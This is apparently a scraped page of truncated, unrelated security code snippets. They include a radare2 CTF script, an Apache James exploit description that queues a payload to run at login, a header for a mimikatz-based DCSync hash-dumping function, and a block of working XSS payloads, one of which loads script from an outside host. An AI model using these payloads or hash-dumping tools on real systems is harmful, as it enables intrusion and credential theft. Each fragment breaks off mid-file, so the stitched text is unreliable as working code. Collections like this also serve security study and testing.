- Recon
- Find vuln
- Exploit
- Document it
Unicornscan from the CLI; nmap from within msfconsole so that its results (loot) are stored in the database.
import sys | |
import r2pipe | |
# Drive radare2 over r2pipe: open ./zwiebel2, reopen it under the debugger,
# and run until the breakpoint at 0x400875 (the `call r14` site) is hit.
r2 = r2pipe.open("./zwiebel2")
# Debugger profile file (zwiebel.rr2); presumably supplies program
# arguments/stdin for the debug session — TODO confirm against the rr2 file
r2.cmd("e dbg.profile=zwiebel.rr2")
r2.cmd("doo") # reopen the target for debugging
r2.cmd("db 0x400875") # set breakpoint at `call r14`
r2.cmd("dc") # continue execution until the breakpoint is hit
def step(): |
<?xml version="1.0" encoding="utf-8" ?> | |
<otrs_package version="1.1"> | |
<Name>MyModule</Name> | |
<Version>1.0.0</Version> | |
<Vendor>My Module</Vendor> | |
<URL>http://otrs.org/</URL> | |
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
<Description Lang="en">MyModule</Description> | |
<Framework>5.x.x</Framework> |
""". | |
This script works on Apache James deployments using the default configuration. | |
It creates a new user and enqueues a payload to be executed the next time a user | |
logs in to the machine. | |
For more details, see: https://www.exploit-db.com/exploits/35513/. | |
""" | |
import gflags |
#!/bin/sh | |
# | |
# `7MN. `7MF' | |
# __, MMN. M | |
#`7MM M YMb M pd""b. | |
# MM M `MN. M (O) `8b | |
# MM M `MM.M ,89 | |
# MM M YMM ""Yb. | |
#.JMML..JML. YM 88 | |
# (O) .M' |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
// To the extent possible under law, the Yawning Angel has waived all copyright | |
// and related or neighboring rights to orhttp_example, using the creative | |
// commons "cc0" public domain dedication. See LICENSE or | |
// <http://creativecommons.org/publicdomain/zero/1.0/> for full details. | |
package main | |
import ( | |
// Things needed by the actual interface. | |
"golang.org/x/net/proxy" |
# BlackArch Mirror list | |
## Australia | |
#Server = http://blackarch.mirror.digitalpacific.com.au/$repo/os/$arch | |
#Server = rsync://mirror.digitalpacific.com.au/blackarch/$repo/os/$arch | |
## Austria | |
#Server = http://mirror.easyname.at/blackarch/$repo/os/$arch | |
#Server = ftp://mirror.easyname.at/blackarch/$repo/os/$arch | |
#Server = rsync://mirror.easyname.at/blackarch/$repo/os/$arch |
# Enable "presence" events | |
# - http://docs.saltstack.com/en/latest/ref/configuration/master.html#presence-events | |
# - http://docs.saltstack.com/en/latest/topics/event/master_events.html#presence-events | |
presence_events: True | |
reactor: | |
# Note: this event tag is misspelled ("presense") in version 2014.1.5 and is subject to change.
- 'salt/presense/change': | |
- /srv/reactor/presence.sls |